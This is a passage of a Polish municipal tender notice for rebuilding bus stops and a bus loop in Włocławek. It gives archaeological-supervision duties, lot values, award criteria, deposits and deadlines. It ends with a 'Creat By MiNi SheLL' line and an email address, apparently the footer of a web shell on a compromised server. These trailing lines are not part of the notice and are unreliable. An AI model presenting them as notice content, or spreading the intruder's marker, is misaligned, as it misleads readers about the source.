wpisanej do rejestru zabytków pod numerem A/1560 decyzją Wojewódzkiego Konserwatora Zabytków w Bydgoszczy z dnia 30 września 1957r. W związku z powyższym w trakcie prac ziemnych związanych z inwestycją należy przepro-wadzić badania archeologiczne ( wydana Decyzja NR ZAR/117/2024 z 17 lipca 2024r- w załącze-niu).Zamawiający przekaże Wykonawcy kontakt do kierownika badań archeologicznych w dniu podpisania Umowy na roboty budowlane, który w wyznaczonym do badań obrębie będzie sporządzał szczegółową doku-mentację prac oraz eksplorował obiekty zgodnie z wydanym pozwoleniem.<br/>Wykonawca jest zobowiązany do:<br/><br/> 1) odhumusowania lub rozebrania warstw konstrukcyjnych nawierzchni w obszarze wyznaczonym do badań archeologicznych ręcznie; <br/>2) zabezpieczenia wykopów<br/>3)	wysłania podanemu przez Zamawiającego kierownikowi badań archeologicznych na adres mailowy - harmonogramu prac budowlanych na co najmniej 7 dni przed ich rozpoczęciem,<br/> 4)	zawiadomienia kierownika badań archeologicznych o planowaniu rozpoczęciu konkretnych prac ziemnych (z udziałem sprzętu mechanicznego i ręcznego, mailowo, telefonicznie lub przez wiadomość sms w terminie co najmniej 2 dni przed ich rozpoczęciem. <br/>5)	w przypadku zmiany terminów rozpoczęcia i zakończenia prac ziemnych względem wskazanego w pkt. 3) harmonogramu, skutecznego zawiadomienia kierownika badań archeologicznych o tym fakcie co najmniej 2 dni przed rozpoczęciem prac, których termin uległ zmianie.<br/><br/>Obowiązkiem wynikającym z art. 32 ust. 1 Ustawy z dnia 23 lipca 2003 r. o ochronie zabytków i opiece nad zabytkami (t. j. Dz. U. z 2022 r. poz. 840 z późn. zm.): „Kto, w trakcie prowadzenia robót budowlanych lub ziem-nych, odkrył przedmiot, co do którego istnieje przypuszczenie, iż jest on zabytkiem, jest obowiązany:<br/>1)	wstrzymać wszelkie roboty mogące uszkodzić lub zniszczyć odkryty przedmiot; <br/>2)	zabezpieczyć, przy użyciu dostępnych środków, ten przedmiot i miejsce jego odkrycia;<br/>3)	niezwłocznie zawiadomić o tym właściwego wojewódzkiego konserwatora zabytków, a jeśli nie jest to możliwe, właściwego wójta (burmistrza, prezydenta miasta)&#34;. Powyższa opinia ma charakter wyłącznie meryto-ryczny.<br/>Materiały archeologiczne pozyskane w trakcie badań archeologicznych przy realizacji inwestycji Muzeum Ziemi Kujawskiej i Dobrzyńskiej we Włocławku przejmie w depozyt (pismo MZKiD-S.42.36/2024 w załączeniu.)<br/>Przyjęcie ewentualnie pozyskanych materiałów będzie możliwe na zasadach określonych w „Regulaminie przekazywania zabytków archeologicznych do zbiorów Muzeum Ziemi Kujawskiej i Dobrzyńskiej we Włocław-ku&#34;, znajdującego się w wraz z niezbędnymi załącznikami na stronie internetowej muzeum (https://muzeum.wloclawek.pl/uslugi/uslugi-archeologiczne).<br/>2). Przystanek Centrum Kultury Browar B 02 dawna nazwa Bechiego – LMK [217]<br/> Przedmiot zamówienia obejmuje kompleksowe wykonanie zatoki autobusowej, chodników wraz z:<br/>a)	wszystkimi robotami przewidzianymi w dokumentacji projektowej do realizacji w pasie drogowym,<br/>b)	budową kanału technologicznego na odcinku przebudowy<br/><br/>Przedmiot zamówienia obejmuje w szczególności:<br/>1)	przebudowę zatoki autobusowej o nawierzchni z betonu cementowego;<br/>2)	przebudowę chodników peronów o nawierzchni z kostki betonowej;<br/>3)	budowę kanału technologicznego;<br/>4)	wykonanie oznakowania pionowego, poziomego i urządzeń bezpieczeństwa ruchu drogowego;<br/>5)	montaż modułowej wiaty przystankowej - 2 modułowej <br/>Przybliżone pole powierzchni projektowanych powierzchni zagospodarowania terenu przedstawia się następu-jąco:<br/>a)	powierzchnia zatoki o nawierzchni z betonu cementowego: ok 76 m2,<br/>b)	powierzchnia chodników i peronu o nawierzchni z kostki betonowej: ok. 155 m2,<br/><br/>Przybliżona długość projektowanych elementów infrastruktury technicznej przedstawia się następująco:<br/>c)	długość kanału technologicznego: ok. 27 m (wraz z trzema studniami);<br/><br/>UWAGA:<br/><br/>Lokalizacja inwestycji w strefie historycznej struktury przestrzennej miasta Włocławek, która jest ujęta w woje-wódzkiej ewidencji zabytków oraz w gminnej ewidencji zabytków Zarządzenie nr 10/2024 Prezydenta Miasta Włocławek z dnia 18 stycznia 2024 r. w sprawie prowadzenia Gminnej Ewidencji Zabytków Gminy Miasta Wło-cławek oraz w zapisach miejscowego planu zagospodarowania przestrzennego miasta Włocławka przyjętego Uchwałą Rady Miasta Włocławek Nr LVII/ 176/2022 z dnia 28.12.2022 r. Skutkiem powyższego strefa podlega ochronie konserwatorskiej na podstawie art. 6 ust. 1 pkt 1 lit. „b”, art. 7 pkt 4, art. 22 ust. 2, 4-5 Ustawy z dnia 23 lipca 2003 r. o ochronie zabytków i opiece nad zabytkami (t.j. Dz. U. z 2022 r. poz. 840 z późn. zm.).<br/>Ponadto w sąsiedztwie przedmiotowej inwestycji zlokalizowane są budynki wpisane do rejestru zabytków: <br/>1)	zespół willi miejskiej przy ul. Bechiego 2 we Włocławku składający się z willi, budynku służbówki, ogrodu jest wpisany do rejestru zabytków województwa kujawsko-pomorskiego pod nr A/1007/1-3 decyzją Kujawsko-Pomorskiego Wojewódzkiego Konserwatora Zabytków z 22 czerwca 2006 r.<br/>2)	zespół Browaru Bojańczyka we Włocławku — wpisanym do rejestru zabytków województwa kujawsko-pomorskiego pod nr A/ 1243/1-5 decyzją Wojewódzkiego Konserwatora Zabytków we Włocławku z dnia 12 czerwca 1998 r.<br/>Obiekty te podlegają ochronie prawnej na mocy art. 6 ust. 1 pkt 1 lit. „b&#34;, „c”, art. 7 ust. 1 Ustawy o ochronie za-bytków i opiece nad zabytkami (t. j. Dz. U. z 2022 r., poz. 840 z późn. zm.).<br/><br/>Obowiązkiem wynikającym z art. 32 ust. 1 Ustawy z dnia 23 lipca 2003 r. o ochronie zabytków i opiece nad zabytkami (t. j. Dz. U. z 2022 r. poz. 840 z późn. zm.): „Kto, w trakcie prowadzenia robót budowlanych lub ziem-nych, odkrył przedmiot, co do którego istnieje przypuszczenie, iž jest on zabytkiem, jest obowiązany:<br/>1)	wstrzymać wszelkie roboty mogące uszkodzić lub zniszczyć odkryty przedmiot; <br/>2)	zabezpieczyć, przy użyciu dostępnych środków, ten przedmiot i miejsce jego odkrycia;<br/>3)	niezwłocznie zawiadomić o tym właściwego wojewódzkiego konserwatora zabytków, a jeśli nie jest to możliwe, właściwego wójta (burmistrza, prezydenta miasta)&#34;. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 330231,66 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233100-0 - Roboty w zakresie budowy autostrad, dróg</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">44212321-5 - Wiaty autobusowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-11-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Najdłuższy okres gwarancji i rękojmi na wykonany przedmiot zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie (część) nr 4: Przebudowa pętli autobusowej przy ul. Ostrowskiej, budowa budynku do ob-sługi transportu publicznego, ogrodu wertykalnego ( z konstrukcją wsporczą) wraz z niezbędną infra-strukturą.<br/><br/> Przedmiot zamówienia obejmuje kompleksowe wykonanie zatoki autobusowej, chodników wraz z:<br/>a)	wszystkimi robotami przewidzianymi w dokumentacji projektowej do realizacji w pasie drogowym,<br/>b)	budową kanału technologicznego na odcinku przebudowy<br/><br/>Przedmiot zamówienia obejmuje w szczególności:<br/>1)	rozbiórka istniejącego budynku <br/>2)	przebudowę zatoki autobusowej o nawierzchni z betonu cementowego;<br/>3)	przebudowę chodników peronów o nawierzchni z kostki betonowej;<br/>4)	budowę kanału technologicznego;<br/>5)	wykonanie budynku do obsługi transportu publicznego wyposażonego w pomieszczenie socjalne dla kierowców autobusów,<br/>6)	włączenie budynku do istniejących przyłączy <br/>7)	wykonanie ogrodu wertykalnego przy wiacie przystankowej wraz z konstrukcją wsporcza.<br/>8)	wykonanie oznakowania pionowego, poziomego i urządzeń bezpieczeństwa ruchu drogowego;<br/>9)	montaż modułowej wiaty przystankowej - 5 modułowej <br/><br/>Przybliżone pole powierzchni projektowanych powierzchni zagospodarowania terenu przedstawia się następu-jąco:<br/><br/>a)	powierzchnia zatoki o nawierzchni z betonu cementowego: ok 241 m2,<br/>b)	powierzchnia chodników i peronu o nawierzchni z kostki betonowej: ok. 248 m2,<br/>c)	budynek do obsługi transportu publicznego :<br/>- powierzchnia zabudowy 18,18 m2<br/>- kubatura 18,96 m3,<br/>-dł.7,5m, szer. 1,5m, wys.2,40 m ( 2,6 m z attyką).<br/><br/>Przybliżona długość projektowanych elementów infrastruktury technicznej przedstawia się następująco:<br/><br/>d)	długość kanału technologicznego: ok. 101 m (wraz z czterema studniami);<br/><br/>Przedmiot zamówienia obejmuje również likwidację wiaty przystankowej na przystanku Ostrowska Pętla 02 (242) </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 873189,91 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233100-0 - Roboty w zakresie budowy autostrad, dróg</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">44212321-5 - Wiaty autobusowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-11-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Najdłuższy okres gwarancji i rękojmi na wykonany przedmiot zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Nie dotyczy.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Nie dotyczy.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> Nie dotyczy. <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Do oferty powinny zostać załączone wszystkie dokumenty wymagane odpowiednimi postanowieniami SWZ, tj.:<br/>1) formularz ofertowy,<br/>2) oświadczenie o niepodleganiu wykluczeniu i spełnianiu warunków udziału w postępowaniu, składane na podstawie art.<br/>125 ust. 1 ustawy PZP – wzór oświadczenia zawarto w załączniku nr 2 do SWZ, z zastrzeżeniem, że:<br/>a) w przypadku wspólnego ubiegania się o zamówienie przez Wykonawców – oświadczenie, o którym mowa w pkt 2, składa<br/>każdy z Wykonawców, przy czym w części dotyczącej spełnienia warunków udziału w postępowaniu tylko w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu,<br/>3) pełnomocnictwo upoważniające do złożenia oferty, o ile ofertę składa pełnomocnik,<br/>4) w przypadku oferty składanej przez wykonawców wspólnie ubiegających się o udzielenie zamówienia - pełnomocnictwo<br/>do reprezentowania w postępowaniu Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia i/lub zawarcia umowy w sprawie zamówienia w imieniu Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia.<br/>5) dokument potwierdzający wniesienie wadium, jeżeli zamawiający żądał wniesienia wadium <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Wykonawca zobowiązany jest przed upływem terminu składania ofert wnieść wadium w wysokości: <br/>1)	w odniesieniu do zadania nr 1: 4000,00 PLN (słownie: cztery tysiące złotych, 00/100);<br/>2)	w odniesieniu do zadania nr 2: 7000,00 PLN (słownie: siedem tysięcy złotych, 00/100); <br/>3)	w odniesieniu do zadania nr 3: 3000,00 PLN (słownie: trzy tysiące złotych, 00/100);<br/>4)	w odniesieniu do zadania nr 4: 8000,00 PLN (słownie: osiem tysięcy złotych, 00/100). <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje możliwość dokonania istotnych zmian umowy w stosunku do treści oferty, na podstawie której<br/>dokonano wyboru Wykonawcy, zgodnie z projektowanymi postanowienia umowy, stanowiącymi załącznik nr 3a, 3b, 3c i 3d do SWZ oraz<br/>ustawą PZP. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-09-04 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">W prowadzonym postępowaniu Wykonawcy składają swoje oferty za pośrednictwem Platformy Przetargowej Urzędu Miasta Włocławek dostępnej pod adresem: https://umwloclawek.logintrade.net/rejestracja/ustawowe.html.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-09-04 10:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-10-03</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Zamawiający wykluczy z postępowania Wykonawcę na podstawie przesłanek wynikających z art. 7 ust. 1 ustawy z dnia 13<br/>kwietnia 2022 roku o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz<br/>służących ochronie bezpieczeństwa narodowego (t.j. Dz. U. z 2025 r., poz. 514).

Creat By MiNi SheLL
Email: jattceo@gmail.com